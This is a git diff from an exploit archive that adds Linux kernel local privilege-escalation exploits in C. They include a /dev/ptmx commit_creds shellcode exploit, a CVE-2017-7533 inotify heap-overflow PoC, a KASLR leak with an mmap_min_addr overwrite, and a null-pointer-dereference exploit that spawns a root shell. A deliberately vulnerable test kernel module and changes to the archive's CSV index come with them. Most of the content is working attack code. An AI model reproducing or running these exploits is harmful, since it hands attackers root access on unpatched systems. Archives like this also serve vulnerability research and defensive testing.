/** pwn.c **/
/**
* Run ./decr first!
*
* 23/04/2016
* - vnik
*/
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <assert.h>
#define MMAP_ADDR 0xff814e3000
#define MMAP_OFFSET 0xb0
typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);
typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred);
void __attribute__((regparm(3))) privesc() {
commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;
prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;
commit_creds(prepare_kernel_cred((uint64_t)NULL));
}
int main() {
void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);
assert(payload == (void *)MMAP_ADDR);
void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);
memset(shellcode, 0, 0x300000);
void *ret = memcpy(shellcode, &privesc, 0x300);
assert(ret == shellcode);
printf("[+] Escalating privs...\n");
int fd = open("/dev/ptmx", O_RDWR);
close(fd);
assert(!getuid());
printf("[+] We've got root!");
return execl("/bin/bash", "-sh", NULL);
}
/** pwn.c EOF **/

349
exploits/linux/local/44302.c Normal file
View file

@ -0,0 +1,349 @@
/*
*
*
* CVE-2017-7533 inotfiy linux kernel vulnerability.
*
* $ gcc -o exploit exploit.c -lpthread
* $./exploit
*
* ```
* Listening for events.
* Listening for events.
* alloc_len : 50
* longname="test_dir/bbbb32103210321032100<30><30>1<EFBFBD><31><EFBFBD><EFBFBD>"
* handle_events() event->name : b, event->len : 16
* Detected overwrite!!!
* callrename done.
* alloc_len : 50
* ```
* This is a heap overflow bug,
* tested on the Debian 8 Linux version 3.16.39(amd64) successfully.
*
* You could modifiy one byte to manipulate rip register, but I do not tried hard to get root.
*
* Thanks to the Vladis Dronov <vdronov () redhat com> and someone from HK university.
* ```
* ```
* Jeremy Huang (jeremyhcw@gmail.com)
*/
//Trigger inotify event by file open and rename to trigger the vulnerability and exploit
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <sys/eventfd.h>
#include <sys/inotify.h>
#include <sys/mman.h>
#include <ctype.h>
#include <errno.h>
#include <err.h>
#include <poll.h>
#include <unistd.h>
void *callrename( void *ptr );
void *openclose( void *ptr );
pthread_t thread1, thread2;
int lastfd;
char *space;
int original,printed, *int_space;
volatile int stop = 0;
// Try kmalloc-192 made by cyclic(100)
char *orig_name = "f";
// 120
//char *orig_name = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
static void handle_events(int fd, int *wd, int argc, char* argv[])
{
/* Some systems cannot read integer variables if they are not
properly aligned. On other systems, incorrect alignment may
decrease performance. Hence, the buffer used for reading from
the inotify file descriptor should have the same alignment as
struct inotify_event. */
char buf[4096]
__attribute__ ((aligned(__alignof__(struct inotify_event))));
const struct inotify_event *event;
int i;
ssize_t len;
char *ptr;
/* Loop while events can be read from inotify file descriptor. */
for (;;) {
/* Read some events. */
len = read(fd, buf, sizeof buf);
if (len == -1 && errno != EAGAIN) {
perror("read");
exit(EXIT_FAILURE);
}
/* If the nonblocking read() found no events to read, then
it returns -1 with errno set to EAGAIN. In that case,
we exit the loop. */
if (len <= 0)
break;
/* Loop over all events in the buffer */
for (ptr = buf; ptr < buf + len;
ptr += sizeof(struct inotify_event) + event->len) {
event = (const struct inotify_event *) ptr;
/* Print event type */
/*
if (event->mask & IN_OPEN)
printf("IN_OPEN: ");
if (event->mask & IN_CLOSE_NOWRITE)
printf("IN_CLOSE_NOWRITE: ");
if (event->mask & IN_CLOSE_WRITE)
printf("IN_CLOSE_WRITE: ");
if (event->mask % IN_ACCESS)
printf("IN_ACCESS: ");
*/
/* Print the name of the watched directory */
for (i = 1; i < argc; ++i) {
if (wd[i] == event->wd) {
//printf("%s/", argv[i]);
break;
}
}
/* Print the name of the file */
if (event->len && strcmp(event->name, orig_name)) {
printf("%s() event->name : %s, event->len : %d\n",__func__, event->name, event->len);
if ( !strcmp(event->name, "b") && strlen(event->name) == 1) {
printf("Detected overwrite!!!\n");
stop = 1;
break;
}
}
/* Print type of filesystem object */
/*
if (event->mask & IN_ISDIR)
printf(" [directory]\n");
else
printf(" [file]\n");
*/
}
}
}
static void* notify_thread_func(void* arg)
{
char buf;
int fd, i, poll_num;
int *wd;
nfds_t nfds;
struct pollfd fds[2];
int argc = 2;
char *argv[] = { NULL, "test_dir", NULL};
/*
if (argc < 2) {
printf("Usage: %s PATH [PATH ...]\n", argv[0]);
exit(EXIT_FAILURE);
}
*/
//printf("Press ENTER key to terminate.\n");
/* Create the file descriptor for accessing the inotify API */
fd = inotify_init1(IN_NONBLOCK);
if (fd == -1) {
perror("inotify_init1");
exit(EXIT_FAILURE);
}
/* Allocate memory for watch descriptors */
wd = calloc(argc, sizeof(int));
if (wd == NULL) {
perror("calloc");
exit(EXIT_FAILURE);
}
/* Mark directories for events
- file was opened
- file was closed */
for (i = 1; i < argc; i++) {
wd[i] = inotify_add_watch(fd, argv[i],
IN_OPEN | IN_CLOSE| IN_ACCESS);
if (wd[i] == -1) {
fprintf(stderr, "Cannot watch '%s'\n", argv[i]);
perror("inotify_add_watch");
exit(EXIT_FAILURE);
}
}
/* Prepare for polling */
nfds = 2;
/* Console input */
fds[0].fd = STDIN_FILENO;
fds[0].events = POLLIN;
/* Inotify input */
fds[1].fd = fd;
fds[1].events = POLLIN;
printf("Listening for events.\n");
while (!stop) {
poll_num = poll(fds, nfds, -1);
if (poll_num == -1) {
if (errno == EINTR)
continue;
perror("poll");
exit(EXIT_FAILURE);
}
if (poll_num > 0) {
if (fds[1].revents & POLLIN) {
handle_events(fd, wd, argc, argv);
}
}
}
close(fd);
free(wd);
exit(EXIT_SUCCESS);
}
void *trigger_rename_open(void* arg)
{
int iret1, iret2,i;
setvbuf(stdout,0,2,0);
iret1 = pthread_create( &thread1, NULL, callrename, NULL);
if(iret1)
{
fprintf(stderr,"Error - pthread_create() return code: %d\n",iret1);
exit(EXIT_FAILURE);
}
iret2 = pthread_create( &thread2, NULL, openclose, NULL);
if(iret2)
{
fprintf(stderr,"Error - pthread_create() return code: %d\n",iret2);
exit(EXIT_FAILURE);
}
pthread_join( thread1, NULL);
pthread_join( thread2, NULL);
exit(EXIT_SUCCESS);
}
// 250
char *longname_padding = "bbbb3210321032103210";
//char *longname_padding = "bbbb32103210321032103210ABCDEF";
/*
rcx : 44434241..
DCDA0123
*/
// char *longname_padding = "bbbb3210321032GFEDCBA";
// 31 will crash
void *callrename( void *ptr )
{
int i,m,k;
char enter = 0;
char origname[1024];
char longname[1024];
char next_ptr[8] = "\x30\xff\xff\x31\xff\xff\xff\xff";
char prev_ptr[8] = "";
// This value will overwrite the next (struct fsnotify_event)event->list.next
// create shortname being initial name.
snprintf(origname, sizeof origname, "test_dir/%s", orig_name);
printf("alloc_len : %d\n", 48 + strlen(orig_name)+1);
//printf("origname=\"%s\"\n", origname);
snprintf(longname, sizeof longname, "test_dir/%s%s%s",
longname_padding, next_ptr, prev_ptr);
//strcat(longname,space);
printf("longname=\"%s\"\n", longname);
for (i=0;i<10000 && !stop ;i++)
{
if (rename(origname,longname)<0) perror("rename1");
if (rename(longname,origname)<0) perror("rename2");
}
printf("callrename done.\n");
}
void *openclose( void *ptr )
{
int j,fd,m,k;
char origname[1024];
snprintf(origname, sizeof origname, "test_dir/%s", orig_name);
for (j=0;j<8000 && !stop;j++ )
{
open(origname,O_RDWR);
}
printf("alloc_len : %d\n", 48 + strlen(orig_name)+1);
}
void main(void)
{
pthread_t notify_thread[4];
pthread_t rename_thread;
int i = 0;
char buf[1024];
snprintf(buf, sizeof buf, "touch test_dir/%s", orig_name);
system("rm -rf /data/local/tmp/test_dir ; mkdir test_dir");
system(buf);
for ( i ; i < 2; i++ ) {
pthread_create(&notify_thread[i],
NULL,
notify_thread_func,
NULL);
}
//Trigger inotify event by file open and rename to
//trigger the vulnerability
pthread_create(&rename_thread, NULL, trigger_rename_open, NULL);
pthread_join(rename_thread, NULL);
for ( i = 0; i < 2; i++ )
pthread_join(notify_thread[i], NULL);
}

307
exploits/linux/local/44303.c Normal file
View file

@ -0,0 +1,307 @@
/** disable_map_min_add.c **/
/*
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/resource.h>
#include <syscall.h>
/* offsets might differ, kernel was custom compiled
* you can read vmlinux and caculate the offset when testing
*/
/*
#define OFFSET_KERNEL_BASE 0x000000
*/
#define MMAP_MIN_ADDR 0x1101de8
#define DAC_MMAP_MIN_ADDR 0xe8e810
/* get kernel functions address by reading /proc/kallsyms */
unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[256];
int ret = 0;
f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
printf("[-] Failed to open /proc/kallsyms\n");
exit(-1);
}
printf("[+] Find %s...\n", name);
while(ret != EOF) {
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fclose(f);
printf("[+] Found %s at %lx\n", name, addr);
return addr;
}
}
fclose(f);
return 0;
}
int main(void)
{
int pid, pid2, pid3;
struct rusage rusage = { };
unsigned long *p, *kernel_base;
char *mmap_min_addr, *dac_mmap_min_addr;
pid = fork();
if (pid > 0) {
/* try to bypass kaslr when /proc/kallsyms isn't readable */
syscall(__NR_waitid, P_PID, pid, NULL, WEXITED|WNOHANG|__WNOTHREAD, &rusage);
printf("[+] Leak size=%d bytes\n", sizeof(rusage));
for (p = (unsigned long *)&rusage;
p < (unsigned long *)((char *)&rusage + sizeof(rusage));
p++) {
printf("[+] Leak point: %p\n", p);
if (*p > 0xffffffff00000000 && *p < 0xffffffffff000000) {
p = (unsigned long *)(*p&0xffffffffff000000 /*+ OFFSET_TO_BASE*/); // spender's wouldn't actually work when KASLR was enabled
break;
}
}
if(p < (unsigned long *)0xffffffff00000000 || p > (unsigned long *)0xffffffffff000000)
exit(-1);
} else if (pid == 0) {
sleep(1);
exit(0);
}
kernel_base = get_kernel_sym("startup_64");
printf("[+] Got kernel base: %p\n", kernel_base);
mmap_min_addr = (char *)kernel_base + MMAP_MIN_ADDR;
printf("[+] Got mmap_min_addr: %p\n", mmap_min_addr);
dac_mmap_min_addr = (char *)kernel_base + DAC_MMAP_MIN_ADDR;
printf("[+] Got dac_mmap_min_addr: %p\n", dac_mmap_min_addr);
pid2 = fork();
if (pid2 > 0) {
printf("[+] Overwriting map_min_addr...\n");
if (syscall(__NR_waitid, P_PID, pid, (siginfo_t *)(mmap_min_addr - 2), WEXITED|WNOHANG|__WNOTHREAD, NULL) < 0) {
printf("[-] Failed!\n");
exit(1);
}
} else if (pid2 == 0) {
sleep(1);
exit(0);
}
pid3 = fork();
if (pid3 > 0) {
printf("[+] Overwriting dac_mmap_min_addr...\n");
if (syscall(__NR_waitid, P_PID, pid, (siginfo_t *)(dac_mmap_min_addr - 2), WEXITED|WNOHANG|__WNOTHREAD, NULL) < 0) {
printf("[-] Failed!\n");
exit(1);
}
printf("[+] map_min_addr disabled!\n");
exit(0);
} else if (pid3 == 0) {
sleep(1);
exit(0);
}
return 0;
}
/** disable_map_min_add.c EOF **/
/** null_poiter_exploit.c **/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <string.h>
#include <unistd.h>
#include <unistd.h>
#include <fcntl.h>
struct cred;
struct task_struct;
typedef struct cred *(*prepare_kernel_cred_t) (struct task_struct *daemon) __attribute__((regparm(3)));
typedef int (*commit_creds_t) (struct cred *new) __attribute__((regparm(3)));
prepare_kernel_cred_t prepare_kernel_cred;
commit_creds_t commit_creds;
/* a kernel null pointer derefence will help get privilege
* /proc/test is a kernel-load module create for testing
* touch_null_kp can be replace your own implement to
* touch a kernel null ponit
*/
void touch_null_kp() {
printf("[+]Start touch kernel null point\n");
int *f = open("/proc/test", O_RDONLY);
read(f, NULL, 0);
}
/* run shell after root */
void get_shell() {
char *argv[] = {"/bin/sh", NULL};
if (getuid() == 0){
printf("[+] Root shell success !! :)\n");
execve("/bin/sh", argv, NULL);
}
printf("[-] failed to get root shell :(\n");
}
/* use for privilige escalation */
void get_root() {
commit_creds(prepare_kernel_cred(0));
}
/* get function address by reading /proc/kallsyms */
unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[256];
int ret = 0;
f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
printf("[-] Failed to open /proc/kallsyms\n");
exit(-1);
}
printf("[+] Find %s...\n", name);
while(ret != EOF) {
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fclose(f);
printf("[+] Found %s at %lx\n", name, addr);
return addr;
}
}
fclose(f);
return 0;
}
int main(int ac, char **av)
{
/* get function address */
prepare_kernel_cred = (prepare_kernel_cred_t)get_kernel_sym("prepare_kernel_cred");
commit_creds = (commit_creds_t)get_kernel_sym("commit_creds");
printf("Got commit_creds:%p,prepare_kernel_cred%p\n", commit_creds, prepare_kernel_cred);
/* allocate memory loacate in 0x00 */
printf("[+] Try to allocat 0x00000000...\n");
if (mmap(0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_ANON|MAP_PRIVATE|MAP_FIXED, -1, 0) == (char *)-1){
printf("[-] Failed to allocat 0x00000000\n");
return -1;
}
printf("[+] Allocation success !\n");
/* memset(0, 0xcc, 4096); */
/*
//movq rax, 0xffffffff81f3f45a
//movq [rax], 0
// it is not nessecc
mov rax, 0x4242424242424242
call rax
xor rax, rax
ret
replace 0x4242424242424242 by get_root
https://defuse.ca/online-x86-assembler.htm#disassembly
*/
unsigned char shellcode[] =
{ /*0x48, 0xC7, 0xC0, 0x5A, 0xF4, 0xF3, 0x81, *//*0x48, 0xC7, 0x00, 0x00, 0x00, 0x00, 0x00,*/ 0x48, 0xB8, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0xFF, 0xD0, 0x48, 0x31, 0xC0, 0xC3 };
/* insert the getroot address to shellcode */
void **get_root_offset = rawmemchr(shellcode, 0x42);
(*get_root_offset) = get_root;
/* map shellcode to 0x00 */
memcpy(0, shellcode, sizeof(shellcode));
/* jmp to 0x00 */
touch_null_kp();
get_shell();
}
/** null_poiter_exploit.c EOF **/
/** test.c **/
#include <linux/init.h>
#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/uaccess.h>
#include <linux/slab.h>
#include <asm/ptrace.h>
#include <asm/thread_info.h>
#define MY_DEV_NAME "test"
#define DEBUG_FLAG "PROC_DEV"
extern unsigned long proc_test_sp_print;
static ssize_t proc_read (struct file *proc_file, char __user *proc_user, size_t n, loff_t *loff);
static ssize_t proc_write (struct file *proc_file, const char __user *proc_user, size_t n, loff_t *loff);
static int proc_open (struct inode *proc_inode, struct file *proc_file);
static struct file_operations a = {
.open = proc_open,
.read = proc_read,
.write = proc_write,
};
static int __init mod_init(void)
{
struct proc_dir_entry *test_entry;
const struct file_operations *proc_fops = &a;
printk(DEBUG_FLAG":proc init start\n");
test_entry = proc_create(MY_DEV_NAME, S_IRUGO|S_IWUGO, NULL, proc_fops);
if(!test_entry)
printk(DEBUG_FLAG":there is somethings wrong!\n");
printk(DEBUG_FLAG":proc init over!\n");
return 0;
}
static ssize_t proc_read (struct file *proc_file, char *proc_user, size_t n, loff_t *loff)
{
void (*fun)(void);
fun = NULL;
//printk("%s:thread.sp0: %p, task->stack: %p\n", "PROC", current->thread.sp0, current->stack);
fun();
//printk("The memory of %p : %d\n", proc_user, *proc_user);
return 0;
}
static ssize_t proc_write (struct file *proc_file, const char __user *proc_user, size_t n, loff_t *loff)
{
printk("%s:thread.sp0: %p, task->stack: %p\n", "PROC", current->thread.sp0, current->stack);
return 0;
}
int proc_open (struct inode *proc_inode, struct file *proc_file)
{
printk(DEBUG_FLAG":into open, cmdline:%s!\n", current->comm);
printk("%s:thread.sp0: %p, task->stack: %p\n", "PROC", current->thread.sp0, current->stack);
return 0;
}
module_init(mod_init);
/** test.c EOF **/

43
files_exploits.csv
View file

@ -1926,7 +1926,7 @@ id,file,description,date,author,type,platform,port
16952,exploits/linux/dos/16952.c,"Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic (Denial of Service) (2)",2011-03-10,zx2c4,dos,linux,
16960,exploits/linux/dos/16960.txt,"Linux NTP query client 4.2.6p1 - Heap Overflow",2011-03-11,mr_me,dos,linux,
16966,exploits/linux/dos/16966.php,"PHP 5.3.6 - 'shmop_read()' Integer Overflow Denial of Service",2011-03-12,"Jose Carlos Norte",dos,linux,
16973,exploits/linux/dos/16973.c,"Linux 2.6.37-rc1 - serial_core TIOCGICOUNT Leak",2011-03-14,prdelka,dos,linux,
16973,exploits/linux/dos/16973.c,"Linux Kenel 2.6.37-rc1 - serial_core TIOCGICOUNT Leak",2011-03-14,prdelka,dos,linux,
16979,exploits/windows/dos/16979.html,"Opera 11.01 - NULL PTR Dereference",2011-03-15,echo,dos,windows,
16986,exploits/windows/dos/16986.py,"AVIPreview 0.26 Alpha - Denial of Service",2011-03-16,BraniX,dos,windows,
16996,exploits/windows/dos/16996.rb,"Fake Webcam 6.1 - Local Crash (PoC)",2011-03-17,"Anastasios Monachos",dos,windows,
@ -2123,7 +2123,7 @@ id,file,description,date,author,type,platform,port
18339,exploits/windows/dos/18339.py,"GPSMapEdit 1.1.73.2 - '.lst' Local Denial of Service",2012-01-09,"Julien Ahrens",dos,windows,
18351,exploits/netware/dos/18351.txt,"Novell Netware - XNFS caller_name xdrDecodeString Remote Code Execution",2012-01-10,"Francis Provencher",dos,netware,
18370,exploits/multiple/dos/18370.txt,"PHP 5.3.8 - Multiple Vulnerabilities",2012-01-14,"Maksymilian Arciemowicz",dos,multiple,
18378,exploits/linux/dos/18378.c,"Linux 2.6.36 IGMP - Remote Denial of Service",2012-01-17,kingcope,dos,linux,
18378,exploits/linux/dos/18378.c,"Linux Kernel 2.6.36 IGMP - Remote Denial of Service",2012-01-17,kingcope,dos,linux,
18976,exploits/php/dos/18976.php,"PHP 5.3.10 - 'spl_autoload()' Local Denial of Service",2012-06-03,"Yakir Wizman",dos,php,
18399,exploits/windows/dos/18399.py,"VideoLAN VLC Media Player 1.2.0 - 'libtaglib_pluggin.dll' Denial of Service",2012-01-20,"Mitchell Adair",dos,windows,
18698,exploits/windows/dos/18698.py,"Xion Audio Player 1.0.127 - '.aiff' Denial of Service",2012-04-04,condis,dos,windows,
@ -2581,7 +2581,7 @@ id,file,description,date,author,type,platform,port
21074,exploits/unix/dos/21074.pl,"glFTPd 1.x - 'LIST' Denial of Service",2001-08-17,"ASGUARD LABS",dos,unix,
21077,exploits/bsd/dos/21077.c,"BSDI 3.0/3.1 - Local Kernel Denial of Service",2001-08-21,V9,dos,bsd,
21092,exploits/hardware/dos/21092.txt,"Cisco CBOS 2.x - Multiple TCP Connection Denial of Service Vulnerabilities",2001-08-23,"Cisco Security",dos,hardware,
40419,exploits/linux/dos/40419.c,"Linux - SELinux W+X Protection Bypass via AIO",2016-09-23,"Google Security Research",dos,linux,
40419,exploits/linux/dos/40419.c,"Linux SELinux - W+X Protection Bypass via AIO",2016-09-23,"Google Security Research",dos,linux,
21099,exploits/windows/dos/21099.c,"Microsoft Windows Server 2000 - RunAs Service Denial of Service",2001-12-11,Camisade,dos,windows,
21103,exploits/hardware/dos/21103.c,"D-Link Dl-704 2.56 b5 - IP Fragment Denial of Service",2000-05-23,phonix,dos,hardware,
21122,exploits/linux/dos/21122.sh,"Linux Kernel 2.2/2.4 - Deep Symbolic Link Denial of Service",2001-10-18,Nergal,dos,linux,
@ -4152,7 +4152,7 @@ id,file,description,date,author,type,platform,port
32881,exploits/windows/dos/32881.py,"QtWeb Browser 2.0 - '.HTML' File Remote Denial of Service",2009-04-01,LiquidWorm,dos,windows,
32899,exploits/windows/dos/32899.py,"Jzip - Buffer Overflow (Denial of Service) (SEH Unicode)",2014-04-16,"motaz reda",dos,windows,
32902,exploits/windows/dos/32902.py,"Microsoft Internet Explorer 8 - File Download Denial of Service",2009-04-11,"Nam Nguyen",dos,windows,
32926,exploits/linux/dos/32926.c,"Linux group_info refcounter - Overflow Memory Corruption",2014-04-18,"Thomas Pollet",dos,linux,
32926,exploits/linux/dos/32926.c,"Linux Kernel - 'group_info' refcounter Overflow Memory Corruption",2014-04-18,"Thomas Pollet",dos,linux,
32939,exploits/windows/dos/32939.txt,"Trend Micro OfficeScan 8.0 Client - Denial of Service",2009-04-21,"Juan Pablo Lopez Yacubian",dos,windows,
32949,exploits/multiple/dos/32949.txt,"Mani's Admin Plugin - Remote Denial of Service",2009-04-22,M4rt1n,dos,multiple,
32951,exploits/novell/dos/32951.py,"Recover Data for Novell Netware 1.0 - '.sav' Remote Denial of Service",2009-04-23,"AbdulAziz Hariri",dos,novell,
@ -5040,7 +5040,7 @@ id,file,description,date,author,type,platform,port
39502,exploits/linux/dos/39502.py,"GpicView 0.2.5 - Crash (PoC)",2016-02-26,"David Silveiro",dos,linux,
39503,exploits/multiple/dos/39503.txt,"Wireshark - print_hex_data_buffer / print_packet Use-After-Free",2016-02-26,"Google Security Research",dos,multiple,
39504,exploits/android/dos/39504.c,"Qualcomm Adreno GPU MSM Driver - perfcounter Query Heap Overflow",2016-02-26,"Google Security Research",dos,android,
39505,exploits/linux/dos/39505.c,"Linux io_submit L2TP sendmsg - Integer Overflow",2016-02-26,"Google Security Research",dos,linux,
39505,exploits/linux/dos/39505.c,"Linux Kernel - io_submit L2TP sendmsg Integer Overflow",2016-02-26,"Google Security Research",dos,linux,
39509,exploits/windows/dos/39509.txt,"Crouzet em4 soft 1.1.04 - '.pm4' Integer Division By Zero",2016-03-01,LiquidWorm,dos,windows,
39512,exploits/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crashes (PoC)",2016-03-01,"Shantanu Khandelwal",dos,windows,
39516,exploits/windows/dos/39516.py,"Quick Tftp Server Pro 2.3 - Read Mode Denial of Service",2016-03-02,"Guillaume Kaddouch",dos,windows,69
@ -5103,7 +5103,7 @@ id,file,description,date,author,type,platform,port
39654,exploits/windows/dos/39654.pl,"Xion Audio Player 1.5 (build 160) - '.mp3' Crash (PoC)",2016-04-04,"Charley Celice",dos,windows,
39657,exploits/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,dos,multiple,
39663,exploits/windows/dos/39663.html,"Microsoft Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",dos,windows,
39669,exploits/linux_x86/dos/39669.txt,"Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco & Ismael Ripoll",dos,linux_x86,
39669,exploits/linux_x86/dos/39669.txt,"Linux Kernel (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco & Ismael Ripoll",dos,linux_x86,
39685,exploits/android/dos/39685.txt,"Google Android - IOMX 'getConfig'/'getParameter' Information Disclosure",2016-04-11,"Google Security Research",dos,android,
39686,exploits/android/dos/39686.txt,"Google Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",dos,android,
39699,exploits/windows/dos/39699.html,"Microsoft Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use-After-Free",2016-04-15,"Marcin Ressel",dos,windows,
@ -5203,7 +5203,7 @@ id,file,description,date,author,type,platform,port
40073,exploits/windows/dos/40073.py,"Microsoft Process Kill Utility (kill.exe) 6.3.9600.17298 - Crash (PoC)",2016-07-08,hyp3rlinx,dos,windows,
40074,exploits/windows/dos/40074.txt,"Microsoft WinDbg - 'logviewer.exe' Crash (PoC)",2016-07-08,hyp3rlinx,dos,windows,
40183,exploits/multiple/dos/40183.html,"WebKit - TypedArray.fill Memory Corruption",2016-07-29,"Google Security Research",dos,multiple,
40182,exploits/arm/dos/40182.txt,"Linux ARM/ARM64 - 'perf_event_open()' Arbitrary Memory Read",2016-07-29,"Google Security Research",dos,arm,
40182,exploits/arm/dos/40182.txt,"Linux Kernel (ARM/ARM64) - 'perf_event_open()' Arbitrary Memory Read",2016-07-29,"Google Security Research",dos,arm,
40310,exploits/multiple/dos/40310.txt,"Adobe Flash - BitmapData.copyPixels Use-After-Free",2016-08-29,"Google Security Research",dos,multiple,
40181,exploits/linux/dos/40181.c,"AppArmor securityfs < 4.8 - 'aa_fs_seq_hash_show' Reference Count Leak",2016-07-29,"Google Security Research",dos,linux,
40155,exploits/php/dos/40155.py,"PHP 5.5.37/5.6.23/7.0.8 - 'bzread()' Out-of-Bounds Write",2016-07-25,"Hans Jerry Illikainen",dos,php,80
@ -5839,7 +5839,7 @@ id,file,description,date,author,type,platform,port
43175,exploits/multiple/dos/43175.html,"WebKit - 'WebCore::RenderObject::previousSibling' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple,
43176,exploits/multiple/dos/43176.html,"WebKit - 'WebCore::FormSubmission::create' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple,
43464,exploits/android/dos/43464.txt,"Android - Inter-Process munmap due to Race Condition in ashmem",2018-01-08,"Google Security Research",dos,android,
43178,exploits/linux/dos/43178.c,"Linux - 'mincore()' Uninitialized Kernel Heap Page Disclosure",2017-11-24,"Google Security Research",dos,linux,
43178,exploits/linux/dos/43178.c,"Linux Kernel - 'mincore()' Uninitialized Kernel Heap Page Disclosure",2017-11-24,"Google Security Research",dos,linux,
43180,exploits/windows/dos/43180.js,"Microsoft Edge Chakra JIT - 'BailOutOnTaggedValue' Bailouts Type Confusion",2017-11-27,"Google Security Research",dos,windows,
43181,exploits/windows/dos/43181.js,"Microsoft Edge Chakra JIT - 'Inline::InlineCallApplyTarget_Shared' does not Return the return Instruction",2017-11-27,"Google Security Research",dos,windows,
43182,exploits/windows/dos/43182.js,"Microsoft Edge Chakra JIT - Incorrect Function Declaration Scope",2017-11-27,"Google Security Research",dos,windows,
@ -5850,7 +5850,7 @@ id,file,description,date,author,type,platform,port
43189,exploits/android/dos/43189.py,"Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download",2017-11-28,"Google Security Research",dos,android,
43194,exploits/linux/dos/43194.txt,"QEMU - NBD Server Long Export Name Stack Buffer Overflow",2017-11-29,"Eric Blake",dos,linux,
43470,exploits/windows/dos/43470.cpp,"Microsoft Windows - 'nt!NtQueryInformationProcess (information class 76_ QueryProcessEnergyValues)' Kernel Stack Memory Disclosure",2018-01-09,"Google Security Research",dos,windows,
43199,exploits/linux/dos/43199.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page",2017-11-30,Bindecy,dos,linux,
43199,exploits/linux/dos/43199.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)",2017-11-30,Bindecy,dos,linux,
43469,exploits/windows/dos/43469.js,"Microsoft Edge Chakra JIT - Escape Analysis Bug",2018-01-09,"Google Security Research",dos,windows,
43207,exploits/windows/dos/43207.txt,"Abyss Web Server < 2.11.6 - Heap Memory Corruption",2017-12-01,hyp3rlinx,dos,windows,
43229,exploits/windows/dos/43229.cs,"Microsoft Windows Defender - Controlled Folder Bypass Through UNC Path",2017-12-07,"Google Security Research",dos,windows,
@ -5901,6 +5901,9 @@ id,file,description,date,author,type,platform,port
44268,exploits/android/dos/44268.txt,"Broadcom BCM43xx Wi-Fi - 'BroadPWN' Denial of Service",2016-12-01,649,dos,android,
44271,exploits/windows/dos/44271.py,"WebLog Expert Enterprise 9.4 - Denial of Service",2018-03-09,hyp3rlinx,dos,windows,
44291,exploits/android/dos/44291.cpp,"Android DRM Services - Buffer Overflow",2018-03-15,"Tamir Zahavi-Brunner",dos,android,
44301,exploits/linux/dos/44301.c,"Linux Kernel < 4.5.1 - Off-By-One (PoC)",2016-10-16,"Vitaly Nikolenko",dos,linux,
44304,exploits/linux/dos/44304.c,"Linux Kernel - 'mincore()' Heap Page Disclosure (PoC)",2017-12-11,anonymous,dos,linux,
44305,exploits/linux/dos/44305.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)",2017-12-11,anonymous,dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -7601,7 +7604,7 @@ id,file,description,date,author,type,platform,port
19293,exploits/windows/local/19293.py,"Sysax 5.62 - Admin Interface Local Buffer Overflow",2012-06-20,"Craig Freyman",local,windows,
